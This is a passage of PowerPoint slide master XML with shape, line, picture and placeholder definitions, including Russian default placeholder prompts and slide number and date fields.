              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="-43200" bIns="-43200" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="139" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7786800" y="214200"/>
            <a:ext cx="1255320" cy="1188360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="221040"/>
            <a:ext cx="8228880" cy="124992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Для правки текста заглавия щёлкните мышью</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="37"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{3BD62010-9C2F-4B83-8599-9538E8F6A49F}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="38"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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5" r:id="rId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 name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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10" name="Line 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7596000" y="166680"/>
            <a:ext cx="1440" cy="1245960"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Line 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468000" y="1412640"/>
            <a:ext cx="7128000" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="-43200" bIns="-43200" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7786800" y="142920"/>
            <a:ext cx="1206000" cy="1283760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{D6D9101B-192A-46D6-A2A3-8E525B0830D4}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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1" r:id="rId3"/>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4" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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145" name="Line 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7596000" y="166680"/>
            <a:ext cx="1440" cy="1245960"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="Line 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468000" y="1412640"/>
            <a:ext cx="7128000" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="-43200" bIns="-43200" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="147" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7786800" y="214200"/>
            <a:ext cx="1255320" cy="1188360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="39"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{DA70DF04-9C86-4571-87EF-3E5EC758CFD7}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="40"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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
        <p:nvSpPr>
          <p:cNvPr id="150" name="PlaceHolder 3"/>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Для правки текста заглавия щёлкните мышью</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="PlaceHolder 4"/>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Для правки структуры щёлкните мышью</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Второй уровень структуры</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Третий уровень структуры</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Четвёртый уровень структуры</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Пятый уровень структуры</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Шестой уровень структуры</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Седьмой уровень структуры</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7" r:id="rId3"/>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2" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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153" name="Line 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7596000" y="166680"/>
            <a:ext cx="1440" cy="1245960"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Line 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468000" y="1412640"/>
            <a:ext cx="7128000" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="-43200" bIns="-43200" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="155" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7786800" y="214200"/>
            <a:ext cx="1255320" cy="1188360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="41"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{6EE2DFD3-8D77-41BD-9BE0-49546DA1F414}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="42"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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9" r:id="rId3"/>
  </p:sldLayoutIdLst>
</p:sldMaster>
</file>

<file path=ppt/slideMasters/slideMaster2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8" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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159" name="Line 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7596000" y="166680"/>
            <a:ext cx="1440" cy="1245960"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="Line 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468000" y="1412640"/>
            <a:ext cx="7128000" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="-43200" bIns="-43200" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="161" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7786800" y="214200"/>
            <a:ext cx="1255320" cy="1188360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="43"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{CDF116D9-04D3-41BB-A211-5D915B2C4A0A}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="44"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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91" r:id="rId3"/>
  </p:sldLayoutIdLst>
</p:sldMaster>
</file>

<file path=ppt/slideMasters/slideMaster2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4" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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165" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
